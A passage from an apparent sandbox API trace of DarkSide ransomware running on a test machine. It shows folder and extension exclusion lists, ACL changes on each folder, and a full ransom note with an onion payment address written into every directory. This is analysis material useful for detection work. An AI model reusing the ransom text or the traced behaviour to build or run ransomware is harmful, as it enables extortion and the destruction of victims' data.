(_Str1="intel", _Str2="CD22") returned 6 [0167.212] wcslen (_String="intel") returned 0x5 [0167.212] _wcsicmp (_Str1="msocache", _Str2="CD22") returned 10 [0167.212] wcslen (_String="msocache") returned 0x8 [0167.212] _wcsicmp (_Str1="perflogs", _Str2="CD22") returned 13 [0167.212] wcslen (_String="perflogs") returned 0x8 [0167.212] _wcsicmp (_Str1="x64dbg", _Str2="CD22") returned 21 [0167.212] wcslen (_String="x64dbg") returned 0x6 [0167.212] _wcsicmp (_Str1="public", _Str2="CD22") returned 13 [0167.212] wcslen (_String="public") returned 0x6 [0167.212] _wcsicmp (_Str1="all users", _Str2="CD22") returned -2 [0167.212] wcslen (_String="all users") returned 0x9 [0167.212] _wcsicmp (_Str1="default", _Str2="CD22") returned 1 [0167.212] wcslen (_String="default") returned 0x7 [0167.212] wcscpy (in: _Dest=0x3262070, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\*" [0167.212] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\*") returned 0x4a [0167.212] wcscpy (in: _Dest=0x3262102, _Source="CD22" | out: _Dest="CD22") returned="CD22" [0167.212] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3282080 [0167.212] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3292088 [0167.214] wcscpy (in: _Dest=0x3282080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22" [0167.214] GetNamedSecurityInfoW () returned 0x0 [0167.214] SetEntriesInAclW () returned 0x0 [0167.215] SetNamedSecurityInfoW () returned 0x0 [0167.221] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x22bfc8) returned 1 [0167.221] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x32e3ec | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0167.221] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\cd22")) returned 1 [0167.222] strlen (_Str="----------- [ Welcome to DarkSide - I-D Foods Corporation] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/LYID3U99RAJSTEYEFWS6SLYDGMUXKNAT3OPKN9D56PIGX1QHBU5DHGUN4HGMX2IW \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n 9NtjyWHbqWYTbhBpJ2ht4tKo7DQgTGmQ4IGHCFvgjiSMTNopVgQ9YIh9KRWkQgmvxviZtJGOakzykMzWKRgxwf2pCxpdMT8iGlKcsSOsxVOUXIGEgpy6tLqliTTEKWnohcYOhCF3DYMePMxEYa0eCmED1EXEG5QOZCpmkgDl5s5VSUF5uhnKsunUtKGS24iEAr2hxsJ1zMcMHmKVrf3bvRyhYVKXwlXVggxE7ncowldcK3v3CiKC24jKVd6OH5QrhVyyQLrFM5RE3Y0RcTeRTIqf1J5CIEhTiG3TH7SEpws4wfkt9RZ7rBWT4n3B69Z9JuPzyFCBwPKF7gTzEYzixIGzFbJyLSZXff9ryv3yL3JeKywAcoBafos0dLSkRgf1X1a1S2ud4kXa5GRU4W7rhCQsnJ8vAcv1AXaPRq9ESySBWQdGCQMSci0ex0oE4EfCDW3jjyXtaPofqNFhibodJFmOyTKwie1OcW6Kh6Ih6JxXXfUXr4VbRILzsiPXsOTTisDaEicID1E0SJRluBus2UhPyogJiZ7UpmUu9LUe3yAi3Bhox3pLv8E \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0x7ca [0167.222] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\cd22\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0167.222] WriteFile (in: hFile=0x1bc, lpBuffer=0x17dc98*, nNumberOfBytesToWrite=0x7ca, lpNumberOfBytesWritten=0x32e3bc, lpOverlapped=0x0 | out: lpBuffer=0x17dc98*, lpNumberOfBytesWritten=0x32e3bc*=0x7ca, lpOverlapped=0x0) returned 1 [0167.223] CloseHandle (hObject=0x1bc) returned 1 [0167.223] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0167.223] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\cd22")) returned 0x10 [0167.224] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\") returned="" [0167.224] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\") returned 0x4e [0167.224] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\*", fInfoLevelId=0x0, lpFindFileData=0x32e61c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32e61c) returned 0x154208 [0167.224] FindNextFileW (in: hFindFile=0x154208, lpFindFileData=0x32e61c | out: lpFindFileData=0x32e61c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b929b70, ftCreationTime.dwHighDateTime=0x1d5dc8d, ftLastAccessTime.dwLowDateTime=0x915e5580, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x915e5580, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0167.224] FindNextFileW (in: hFindFile=0x154208, lpFindFileData=0x32e61c | out: lpFindFileData=0x32e61c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd16306b0, ftCreationTime.dwHighDateTime=0x1d5df85, ftLastAccessTime.dwLowDateTime=0xe2c502f0, ftLastAccessTime.dwHighDateTime=0x1d5d7f1, ftLastWriteTime.dwLowDateTime=0xe2c502f0, ftLastWriteTime.dwHighDateTime=0x1d5d7f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="n9X_", cAlternateFileName="")) returned 1 [0167.224] _wcsicmp (_Str1="$recycle.bin", _Str2="n9X_") returned -74 [0167.224] wcslen (_String="$recycle.bin") returned 0xc [0167.224] _wcsicmp (_Str1="config.msi", _Str2="n9X_") returned -11 [0167.224] wcslen (_String="config.msi") returned 0xa [0167.225] _wcsicmp (_Str1="$windows.~bt", _Str2="n9X_") returned -74 [0167.225] wcslen (_String="$windows.~bt") returned 0xc [0167.225] _wcsicmp (_Str1="$windows.~ws", _Str2="n9X_") returned -74 [0167.225] wcslen (_String="$windows.~ws") returned 0xc [0167.225] _wcsicmp (_Str1="windows", _Str2="n9X_") returned 9 [0167.225] wcslen (_String="windows") returned 0x7 [0167.225] _wcsicmp (_Str1="appdata", _Str2="n9X_") returned -13 [0167.225] wcslen (_String="appdata") returned 0x7 [0167.225] _wcsicmp (_Str1="application data", _Str2="n9X_") returned -13 [0167.225] wcslen (_String="application data") returned 0x10 [0167.225] _wcsicmp (_Str1="boot", _Str2="n9X_") returned -12 [0167.225] wcslen (_String="boot") returned 0x4 [0167.225] _wcsicmp (_Str1="google", _Str2="n9X_") returned -7 [0167.225] wcslen (_String="google") returned 0x6 [0167.225] _wcsicmp (_Str1="mozilla", _Str2="n9X_") returned -1 [0167.225] wcslen (_String="mozilla") returned 0x7 [0167.225] _wcsicmp (_Str1="program files", _Str2="n9X_") returned 2 [0167.225] wcslen (_String="program files") returned 0xd [0167.225] _wcsicmp (_Str1="program files (x86)", _Str2="n9X_") returned 2 [0167.225] wcslen (_String="program files (x86)") returned 0x13 [0167.225] _wcsicmp (_Str1="programdata", _Str2="n9X_") returned 2 [0167.225] wcslen (_String="programdata") returned 0xb [0167.225] _wcsicmp (_Str1="system volume information", _Str2="n9X_") returned 5 [0167.225] wcslen (_String="system volume information") returned 0x19 [0167.225] _wcsicmp (_Str1="tor browser", _Str2="n9X_") returned 6 [0167.225] wcslen (_String="tor browser") returned 0xb [0167.225] _wcsicmp (_Str1="windows.old", _Str2="n9X_") returned 9 [0167.225] wcslen (_String="windows.old") returned 0xb [0167.225] _wcsicmp (_Str1="intel", _Str2="n9X_") returned -5 [0167.225] wcslen (_String="intel") returned 0x5 [0167.226] _wcsicmp (_Str1="msocache", _Str2="n9X_") returned -1 [0167.226] wcslen (_String="msocache") returned 0x8 [0167.226] _wcsicmp (_Str1="perflogs", _Str2="n9X_") returned 2 [0167.226] wcslen (_String="perflogs") returned 0x8 [0167.226] _wcsicmp (_Str1="x64dbg", _Str2="n9X_") returned 10 [0167.226] wcslen (_String="x64dbg") returned 0x6 [0167.226] _wcsicmp (_Str1="public", _Str2="n9X_") returned 2 [0167.226] wcslen (_String="public") returned 0x6 [0167.226] _wcsicmp (_Str1="all users", _Str2="n9X_") returned -13 [0167.226] wcslen (_String="all users") returned 0x9 [0167.226] _wcsicmp (_Str1="default", _Str2="n9X_") returned -10 [0167.226] wcslen (_String="default") returned 0x7 [0167.226] wcscpy (in: _Dest=0x3292088, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\*" [0167.226] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\*") returned 0x4f [0167.226] wcscpy (in: _Dest=0x3292124, _Source="n9X_" | out: _Dest="n9X_") returned="n9X_" [0167.226] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x32b2098 [0167.226] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x32c20a0 [0167.228] wcscpy (in: _Dest=0x32b2098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\n9X_" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\n9X_") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\n9X_" [0167.228] GetNamedSecurityInfoW () returned 0x0 [0167.228] SetEntriesInAclW () returned 0x0 [0167.228] SetNamedSecurityInfoW () returned 0x0 [0167.232] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x22c068) returned 1 [0167.232] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x32e16c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0167.232] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\n9X_" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\cd22\\n9x_")) returned 1 [0167.232] strlen (_Str="----------- [ Welcome to DarkSide - I-D Foods Corporation] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/LYID3U99RAJSTEYEFWS6SLYDGMUXKNAT3OPKN9D56PIGX1QHBU5DHGUN4HGMX2IW \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n 9NtjyWHbqWYTbhBpJ2ht4tKo7DQgTGmQ4IGHCFvgjiSMTNopVgQ9YIh9KRWkQgmvxviZtJGOakzykMzWKRgxwf2pCxpdMT8iGlKcsSOsxVOUXIGEgpy6tLqliTTEKWnohcYOhCF3DYMePMxEYa0eCmED1EXEG5QOZCpmkgDl5s5VSUF5uhnKsunUtKGS24iEAr2hxsJ1zMcMHmKVrf3bvRyhYVKXwlXVggxE7ncowldcK3v3CiKC24jKVd6OH5QrhVyyQLrFM5RE3Y0RcTeRTIqf1J5CIEhTiG3TH7SEpws4wfkt9RZ7rBWT4n3B69Z9JuPzyFCBwPKF7gTzEYzixIGzFbJyLSZXff9ryv3yL3JeKywAcoBafos0dLSkRgf1X1a1S2ud4kXa5GRU4W7rhCQsnJ8vAcv1AXaPRq9ESySBWQdGCQMSci0ex0oE4EfCDW3jjyXtaPofqNFhibodJFmOyTKwie1OcW6Kh6Ih6JxXXfUXr4VbRILzsiPXsOTTisDaEicID1E0SJRluBus2UhPyogJiZ7UpmUu9LUe3yAi3Bhox3pLv8E \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0x7ca [0167.232] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\cd22\\n9x_\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0167.232] WriteFile (in: hFile=0x1bc, lpBuffer=0x17dc98*, nNumberOfBytesToWrite=0x7ca, lpNumberOfBytesWritten=0x32e13c, lpOverlapped=0x0 | out: lpBuffer=0x17dc98*, lpNumberOfBytesWritten=0x32e13c*=0x7ca, lpOverlapped=0x0) returned 1 [0167.233] CloseHandle (hObject=0x1bc) returned 1 [0167.234] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0167.234] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\n9X_" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\cd22\\n9x_")) returned 0x10 [0167.234] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\n9X_" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\n9X_\\") returned="" [0167.234] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\n9X_\\") returned 0x53 [0167.234] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\n9X_\\*", fInfoLevelId=0x0, lpFindFileData=0x32e39c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32e39c) returned 0x154248 [0167.234] FindNextFileW (in: hFindFile=0x154248, lpFindFileData=0x32e39c | out: lpFindFileData=0x32e39c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd16306b0, ftCreationTime.dwHighDateTime=0x1d5df85, ftLastAccessTime.dwLowDateTime=0x9160b6e0, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x9160b6e0, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0167.235] FindNextFileW (in: hFindFile=0x154248, lpFindFileData=0x32e39c | out: lpFindFileData=0x32e39c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x718184e0, ftCreationTime.dwHighDateTime=0x1d5e2b1, ftLastAccessTime.dwLowDateTime=0xd367aa60, ftLastAccessTime.dwHighDateTime=0x1d5e3e5, ftLastWriteTime.dwLowDateTime=0xd367aa60, ftLastWriteTime.dwHighDateTime=0x1d5e3e5, nFileSizeHigh=0x0, nFileSizeLow=0x16db5, dwReserved0=0x0, dwReserved1=0x0, cFileName="AMFkbPo.jpg", cAlternateFileName="")) returned 1 [0167.235] _wcsicmp (_Str1="AMFkbPo.jpg", _Str2="README.c06622a1.TXT") returned -17 [0167.235] wcsstr (_Str="AMFkbPo.jpg", _SubStr="README") returned 0x0 [0167.235] _wcsicmp (_Str1="autorun.inf", _Str2="AMFkbPo.jpg") returned 8 [0167.235] wcslen (_String="autorun.inf") returned 0xb [0167.235] _wcsicmp (_Str1="boot.ini", _Str2="AMFkbPo.jpg") returned 1 [0167.235] wcslen (_String="boot.ini") returned 0x8 [0167.235] _wcsicmp (_Str1="bootfont.bin", _Str2="AMFkbPo.jpg") returned 1 [0167.235] wcslen (_String="bootfont.bin") returned 0xc [0167.235] _wcsicmp (_Str1="bootsect.bak", _Str2="AMFkbPo.jpg") returned 1 [0167.235] wcslen (_String="bootsect.bak") returned 0xc [0167.235] _wcsicmp (_Str1="desktop.ini", _Str2="AMFkbPo.jpg") returned 3 [0167.235] wcslen (_String="desktop.ini") returned 0xb [0167.235] _wcsicmp (_Str1="iconcache.db", _Str2="AMFkbPo.jpg") returned 8 [0167.235] wcslen (_String="iconcache.db") returned 0xc [0167.235] _wcsicmp (_Str1="ntldr", _Str2="AMFkbPo.jpg") returned 13 [0167.236] wcslen (_String="ntldr") returned 0x5 [0167.236] _wcsicmp (_Str1="ntuser.dat", _Str2="AMFkbPo.jpg") returned 13 [0167.236] wcslen (_String="ntuser.dat") returned 0xa [0167.236] _wcsicmp (_Str1="ntuser.dat.log", _Str2="AMFkbPo.jpg") returned 13 [0167.236] wcslen (_String="ntuser.dat.log") returned 0xe [0167.236] _wcsicmp (_Str1="ntuser.ini", _Str2="AMFkbPo.jpg") returned 13 [0167.236] wcslen (_String="ntuser.ini") returned 0xa [0167.236] _wcsicmp (_Str1="thumbs.db", _Str2="AMFkbPo.jpg") returned 19 [0167.236] wcslen (_String="thumbs.db") returned 0x9 [0167.236] _wcsicmp (_Str1="386", _Str2="jpg") returned -55 [0167.236] wcslen (_String="386") returned 0x3 [0167.236] _wcsicmp (_Str1="adv", _Str2="jpg") returned -9 [0167.236] wcslen (_String="adv") returned 0x3 [0167.236] _wcsicmp (_Str1="ani", _Str2="jpg") returned -9 [0167.236] wcslen (_String="ani") returned 0x3 [0167.236] _wcsicmp (_Str1="bat", _Str2="jpg") returned -8 [0167.236] wcslen (_String="bat") returned 0x3 [0167.236] _wcsicmp (_Str1="bin", _Str2="jpg") returned -8 [0167.236] wcslen (_String="bin") returned 0x3 [0167.236] _wcsicmp (_Str1="cab", _Str2="jpg") returned -7 [0167.236] wcslen (_String="cab") returned 0x3 [0167.236] _wcsicmp (_Str1="cmd", _Str2="jpg") returned -7 [0167.236] wcslen (_String="cmd") returned 0x3 [0167.236] _wcsicmp (_Str1="com", _Str2="jpg") returned -7 [0167.236] wcslen (_String="com") returned 0x3 [0167.236] _wcsicmp (_Str1="cpl", _Str2="jpg") returned -7 [0167.236] wcslen (_String="cpl") returned 0x3 [0167.236] _wcsicmp (_Str1="cur", _Str2="jpg") returned -7 [0167.236] wcslen (_String="cur") returned 0x3 [0167.236] _wcsicmp (_Str1="deskthemepack", _Str2="jpg") returned -6 [0167.236] wcslen (_String="deskthemepack") returned 0xd [0167.236] _wcsicmp (_Str1="diagcab", _Str2="jpg") returned -6 [0167.236] wcslen (_String="diagcab") returned 0x7 [0167.237] _wcsicmp (_Str1="diagcfg", _Str2="jpg") returned -6 [0167.237] wcslen (_String="diagcfg") returned 0x7 [0167.237] _wcsicmp (_Str1="diagpkg", _Str2="jpg") returned -6 [0167.237] wcslen (_String="diagpkg") returned 0x7 [0167.237] _wcsicmp (_Str1="dll", _Str2="jpg") returned -6 [0167.237] wcslen (_String="dll") returned 0x3 [0167.237] _wcsicmp (_Str1="drv", _Str2="jpg") returned -6 [0167.237] wcslen (_String="drv") returned 0x3 [0167.237] _wcsicmp (_Str1="exe", _Str2="jpg") returned -5 [0167.237] wcslen (_String="exe") returned 0x3 [0167.237] _wcsicmp (_Str1="hlp", _Str2="jpg") returned -2 [0167.238] wcslen (_String="hlp") returned 0x3 [0167.238] _wcsicmp (_Str1="icl", _Str2="jpg") returned -1 [0167.238] wcslen (_String="icl") returned 0x3 [0167.238] _wcsicmp (_Str1="icns", _Str2="jpg") returned -1 [0167.238] wcslen (_String="icns") returned 0x4 [0167.238] _wcsicmp (_Str1="ico", _Str2="jpg") returned -1 [0167.238] wcslen (_String="ico") returned 0x3 [0167.238] _wcsicmp (_Str1="ics", _Str2="jpg") returned -1 [0167.238] wcslen (_String="ics") returned 0x3 [0167.238] _wcsicmp (_Str1="idx", _Str2="jpg") returned -1 [0167.238] wcslen (_String="idx") returned 0x3 [0167.239] _wcsicmp (_Str1="ldf", _Str2="jpg") returned 2 [0167.239] wcslen (_String="ldf") returned 0x3 [0167.239] _wcsicmp (_Str1="lnk", _Str2="jpg") returned 2 [0167.239] wcslen (_String="lnk") returned 0x3 [0167.239] _wcsicmp (_Str1="mod", _Str2="jpg") returned 3 [0167.239] wcslen (_String="mod") returned 0x3 [0167.239] _wcsicmp (_Str1="mpa", _Str2="jpg") returned 3 [0167.239] wcslen (_String="mpa") returned 0x3 [0167.239] _wcsicmp (_Str1="msc", _Str2="jpg") returned 3 [0167.239] wcslen (_String="msc") returned 0x3 [0167.239] _wcsicmp (_Str1="msp", _Str2="jpg") returned 3 [0167.239] wcslen (_String="msp") returned 0x3 [0167.240] _wcsicmp (_Str1="msstyles", _Str2="jpg") returned 3 [0167.240] wcslen (_String="msstyles") returned 0x8 [0167.240] _wcsicmp (_Str1="msu", _Str2="jpg") returned 3 [0167.240] wcslen (_String="msu") returned 0x3 [0167.240] _wcsicmp (_Str1="nls", _Str2="jpg") returned 4 [0167.240] wcslen (_String="nls") returned 0x3 [0167.240] _wcsicmp (_Str1="nomedia", _Str2="jpg") returned 4 [0167.240] wcslen (_String="nomedia") returned 0x7 [0167.240] _wcsicmp (_Str1="ocx", _Str2="jpg") returned 5 [0167.240] wcslen (_String="ocx") returned 0x3 [0167.240] _wcsicmp (_Str1="prf", _Str2="jpg") returned 6 [0167.240] wcslen (_String="prf") returned 0x3 [0167.240] _wcsicmp (_Str1="ps1", _Str2="jpg") returned 6 [0167.240] wcslen (_String="ps1") returned 0x3 [0167.240] _wcsicmp (_Str1="rom", _Str2="jpg") returned 8 [0167.240] wcslen (_String="rom") returned 0x3 [0167.240] _wcsicmp (_Str1="rtp", _Str2="jpg") returned 8 [0167.240] wcslen (_String="rtp") returned 0x3 [0167.253] _wcsicmp (_Str1="scr", _Str2="jpg") returned 9 [0167.253] wcslen (_String="scr") returned 0x3 [0167.253] _wcsicmp (_Str1="shs", _Str2="jpg") returned 9 [0167.253] wcslen (_String="shs") returned 0x3 [0167.253] _wcsicmp (_Str1="spl", _Str2="jpg") returned 9 [0167.253] wcslen (_String="spl") returned 0x3 [0167.254] _wcsicmp (_Str1="sys", _Str2="jpg") returned 9 [0167.254] wcslen (_String="sys") returned 0x3 [0167.254] _wcsicmp (_Str1="theme", _Str2="jpg") returned 10 [0167.254] wcslen (_String="theme") returned 0x5 [0167.254] _wcsicmp (_Str1="themepack", _Str2="jpg") returned 10 [0167.254] wcslen (_String="themepack") returned 0x9 [0167.254] _wcsicmp (_Str1="wpx", _Str2="jpg") returned 13 [0167.254] wcslen (_String="wpx") returned 0x3 [0167.254] _wcsicmp (_Str1="lock", _Str2="jpg") returned 2 [0167.254] wcslen (_String="lock") returned 0x4 [0167.254] _wcsicmp (_Str1="key", _Str2="jpg") returned 1 [0167.254] wcslen (_String="key") returned 0x3 [0167.254] _wcsicmp (_Str1="hta", _Str2="jpg") returned -2 [0167.254] wcslen (_String="hta") returned 0x3 [0167.254] _wcsicmp (_Str1="msi", _Str2="jpg") returned 3 [0167.254] wcslen (_String="msi") returned 0x3 [0167.254] _wcsicmp (_Str1="pdb", _Str2="jpg") returned 6 [0167.254] wcslen (_String="pdb") returned 0x3 [0167.254] _wcsicmp (_Str1="sqlite", _Str2="jpg") returned 9 [0167.254] wcslen (_String="sqlite") returned 0x6 [0167.254] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\n9X_" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\cd22\\n9x_")) returned 0x10 [0167.254] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x32e20b0 [0167.255] wcscpy (in: _Dest=0x32e20b0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\n9X_" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\n9X_") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\n9X_" [0167.255] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\n9X_") returned 0x52 [0167.255] wcscpy (in: _Dest=0x32e2156, _Source="AMFkbPo.jpg" | out: _Dest="AMFkbPo.jpg") returned="AMFkbPo.jpg" [0167.255] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH 